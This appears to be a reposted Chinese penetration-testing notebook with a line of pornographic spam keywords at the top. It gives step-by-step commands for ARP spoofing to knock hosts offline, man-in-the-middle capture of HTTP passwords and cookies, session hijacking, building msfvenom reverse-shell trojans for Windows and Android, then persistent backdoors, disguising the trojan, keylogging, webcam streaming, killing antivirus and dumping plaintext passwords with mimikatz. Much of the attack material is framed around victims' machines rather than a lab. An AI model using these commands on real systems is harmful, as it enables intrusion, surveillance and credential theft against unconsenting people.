日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) >

Web安全渗透

發(fā)布時(shí)間:2023/12/13 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Web安全渗透 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

1. 局域網(wǎng)斷網(wǎng)攻擊

wins下

ipconfig

查看主機(jī)網(wǎng)絡(luò)IP。

在vmware下

ifconfig

獲取當(dāng)前虛擬機(jī)網(wǎng)卡,可能是eth0

fping -asg 172.20.12.254/24

獲取局域網(wǎng)網(wǎng)關(guān)中的所有主機(jī),網(wǎng)關(guān)為172.20.12.254

arpspoof -i eth0(網(wǎng)卡) -t 192.168.1.10(目標(biāo)主機(jī)的IP) 192.168.1.1(目標(biāo)主機(jī)所在的網(wǎng)關(guān))arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

這樣就可以使得Ip為192.168.1.10,網(wǎng)關(guān)為192.168.1.1,無(wú)法連網(wǎng)。

原理:流量劫持
正常上網(wǎng):上網(wǎng)—》網(wǎng)關(guān)—》外網(wǎng)
上網(wǎng)—》劫持機(jī)的網(wǎng)卡(所有的流量都經(jīng)過(guò)我)—》不轉(zhuǎn)發(fā)到外網(wǎng),導(dǎo)致斷網(wǎng)

2. 流量劫持,并轉(zhuǎn)發(fā)到外網(wǎng),這樣可查看所有會(huì)話,中間人攻擊

echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉(zhuǎn)發(fā) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

工具:arpspoof –>流量欺騙
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入

driftnet -i eth0

可以查看圖經(jīng)過(guò)網(wǎng)卡所有的圖片信息,這樣就能查看 IP192.168.1.10所瀏覽的圖片,但其仍然可以上網(wǎng)。

3. http賬號(hào)密碼獲取

首先流量欺騙

echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉(zhuǎn)發(fā) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

其次,抓包
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入

ettercap -Tq -i eth0

工具:ettercap抓取網(wǎng)絡(luò)當(dāng)中傳送的數(shù)據(jù)包,-T代表文本模式,q代表安靜模式。

這樣就可以捕獲到 IP192.168.1.10登陸到的所有http網(wǎng)頁(yè)下的賬號(hào)和密碼。

4.局域網(wǎng)內(nèi)Session會(huì)話劫持

Session,通俗的講,瀏覽器 打開(kāi)–》關(guān)閉這個(gè)期間是一個(gè)會(huì)話。
在同一個(gè)局域網(wǎng)當(dāng)中,登錄別人的百度貼吧等。

首先,流量轉(zhuǎn)發(fā),流量欺騙

echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉(zhuǎn)發(fā) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙

其次,捕獲數(shù)據(jù)

ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入

tcpdump -i eth0 -w test.cap

用來(lái)捕獲數(shù)據(jù)。w寫(xiě)入,tcpdump抓去打到本地的數(shù)據(jù)包。

最后,解析數(shù)據(jù)

ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入

ferret -r test.cap

下面需要設(shè)置瀏覽器的代理
Edit—》Preferences—》Advanced—>Network—>Connection—>Settings—>Manual proxy configuration
接著進(jìn)入下一步,模擬受害者登陸
ctrl + shift + t,新打開(kāi)一個(gè)終端,輸入

hamster

再接著進(jìn)入瀏覽器,輸入 127.0.0.1:1234
就可以看到所有的cookies
點(diǎn)擊cookies就可以模擬受害者登陸。

工具:用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 進(jìn)行ARP欺騙 tcpdump抓去打到本地的數(shù)據(jù)包 Ferret用來(lái)處理抓下來(lái)的數(shù)據(jù)包的 Hamster跟ferret配合使用,提供一個(gè)web服務(wù)來(lái)讓我們交互控制。

整個(gè)流程可見(jiàn)

開(kāi)始arp欺騙 命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 捕獲數(shù)據(jù)包 命令:tcpdump -i eth0 -w cookie.cap 模擬受害者登錄 受害者在受害機(jī)器上就隨便刷新一下或者登錄一下 完畢下面我們開(kāi)始重點(diǎn) 處理抓去的數(shù)據(jù)包ferret -r cookie.cap 自動(dòng)生成了 hamster.txt 記得設(shè)置瀏覽器代理: 開(kāi)啟hamster服務(wù) 打開(kāi)hamster 瀏覽器輸入http://127.0.0.1:1234

5.生成木門(mén)

攻擊端:
OS:Kali
IP:192.168.1.104

被害端:
OS:Windows (64位)
IP:192.168.1.10

metaspolit framework
msf利器!
如何生成木門(mén)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=55555 -f exe -o muma.exe

LHOST 為虛擬機(jī)的IP,LPORT為虛擬機(jī)的端口,我們是用虛擬機(jī)作為攻擊機(jī)。
ctrl + shift +t , 重新打開(kāi)一個(gè)端口
輸入

msfconsole #控制臺(tái) use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 虛擬機(jī)IP set LPORT 55555 #55555為虛擬機(jī)端口 exploit

下面開(kāi)始尋找肉機(jī),只要?jiǎng)e人打開(kāi)這個(gè)muma.exe,就會(huì)成功找到。

別人必須打開(kāi)這個(gè) .exe 文件?如何讓別人打開(kāi)?360 直接就能屏蔽?
監(jiān)聽(tīng)鍵盤(pán),輸入的是漢語(yǔ),監(jiān)聽(tīng)輸出的是英文,這是以為監(jiān)聽(tīng)鍵盤(pán)僅僅只是監(jiān)聽(tīng)鍵盤(pán)的輸入字符。

幫助菜單

meterpreter > ?

轉(zhuǎn)移 meterpreter到其他進(jìn)程
(轉(zhuǎn)移的目的是為了防止被攻擊人查看進(jìn)程管理器,殺死不明進(jìn)程,一般轉(zhuǎn)移到屏幕桌面進(jìn)程explorer.exe,只要屏幕不關(guān)閉,metersploit進(jìn)程就不關(guān)閉)

meterpreter > getuid // 查看當(dāng)前權(quán)限 meterpreter > ps // 列出當(dāng)前權(quán)限

將木馬文件test.exe 的進(jìn)程pid遷移到 PID為2044的explorer的進(jìn)程

meterpreter > migrate 2044

驗(yàn)證

meterpreter > ps

查看可知,test.exe進(jìn)程已經(jīng)沒(méi)有了。需要注意的是如果存在殺軟的話可能會(huì)阻止進(jìn)程注入

安裝后門(mén) metsvc
(安裝后門(mén)的目的是為了進(jìn)行開(kāi)機(jī)自啟動(dòng),修改注冊(cè)表之類的,讓木馬能長(zhǎng)久的存活,一般把木馬test.exe 文件 改成qqconfig.exe之類的偽裝名,肉機(jī)就不敢刪除。)

meterpreter > run metsvc

metsvc后門(mén)安裝成功,接下來(lái)是連接
ctrl + shift +t , 重新打開(kāi)一個(gè)端口

msfconsolemsf > use multi/handlermsf exploit(handler) > set payload windows/metsvc_bind_tcpmsf exploit(handler) > show optionsmsf exploit(handler) > set RHOST 192.168.1.10 msf exploit(handler) > set LPORT 31337 msf exploit(handler) > exploit

其中 RHOST 為肉機(jī)的IP, 端口設(shè)置為metsvc所創(chuàng)建的端口

查看肉機(jī)的系統(tǒng)

meterpreter > sysinfo

獲取作為運(yùn)行服務(wù)器的用戶

getuid

盡可能獲取盡可能多的特權(quán)

getprivs

獲得系統(tǒng)管理員權(quán)限

getsystem

獲取目標(biāo)主機(jī)的圖形界面(VNC)

meterpreter > run vnc

查看屏幕

meterpreter > keyscan_start #啟動(dòng)時(shí)與如 Word 或?yàn)g覽器的進(jìn)程相關(guān)聯(lián)的鍵盤(pán)記錄軟件 meterpreter > keyscan_dump #鍵盤(pán)記錄軟件的內(nèi)容轉(zhuǎn)儲(chǔ) meterpreter >keyscan_stop #停止鍵盤(pán)記錄軟件

抓去 meterpreter 桌面的屏幕截圖

screenshot

控制攝像頭

meterpreter > webcam_stream

控制鼠標(biāo)
uictl -啟用用戶界面組件的一些控件

meterpreter > uictl disable mouse #鼠標(biāo)失效 meterpreter > uictl enable mouse #

查看當(dāng)前進(jìn)程

ps

重新打開(kāi)連接

meterpreter > rerun

查看目標(biāo)主機(jī)都采用了那些防護(hù)措施,列出幫助菜單,關(guān)閉防火墻以及其它我們發(fā)現(xiàn)的防護(hù)措施:

meterpreter >run getcountermeasure meterpreter >run getcountermeasuer -h meterpreter >run getcountermeasuer -d -k

killav腳本來(lái)殺死目標(biāo)主機(jī)運(yùn)行的殺毒軟件

meterpreter > run killav

識(shí)別被控制的主機(jī)是否是一臺(tái)虛擬機(jī)

meterpreter >run checkvm

在一個(gè)meterpreter會(huì)話界面中使用cmd shell

meterpreter >shell

獲取密碼

法國(guó)神器mimikatz可以直接獲得操作系統(tǒng)的明文密碼,meterpreter添加了這個(gè)模塊。
首先加載mimikatz模塊。
由于我的Windows 2008是64位的,所以先要轉(zhuǎn)移到64位進(jìn)程。

meterpreter > ps meterpreter > migrate 2780

pid 2780 為64位進(jìn)程 winlogon.exe

meterpreter > load mimikatz

獲取密碼哈希

meterpreter > msv

獲取明文密碼

meterpreter > kerberos

參考主頁(yè)
https://www.91ri.org/8625.html
https://www.91ri.org/9018.html


待學(xué)習(xí)的網(wǎng)頁(yè)
https://www.91ri.org/8879.html
https://www.91ri.org/9548.html
https://www.91ri.org/9560.html
https://www.91ri.org/11060.html
https://www.91ri.org/7170.html
https://www.91ri.org/12488.html
https://www.91ri.org/6843.html


6.滲透安卓 Android

生成木馬

msfvenom -p android/meterpreter/reverse_tcp LHOST=虛擬機(jī)IP LPORT= 55555 R > test.apk

ctrl + shift + t 打開(kāi)另外一個(gè)終端

msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 虛擬機(jī)IP set LPORT 55555 exploit

更多細(xì)節(jié)可查看
http://www.myexception.cn/android/2023190.html

7.繼續(xù)

總結(jié)

以上是生活随笔為你收集整理的Web安全渗透的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。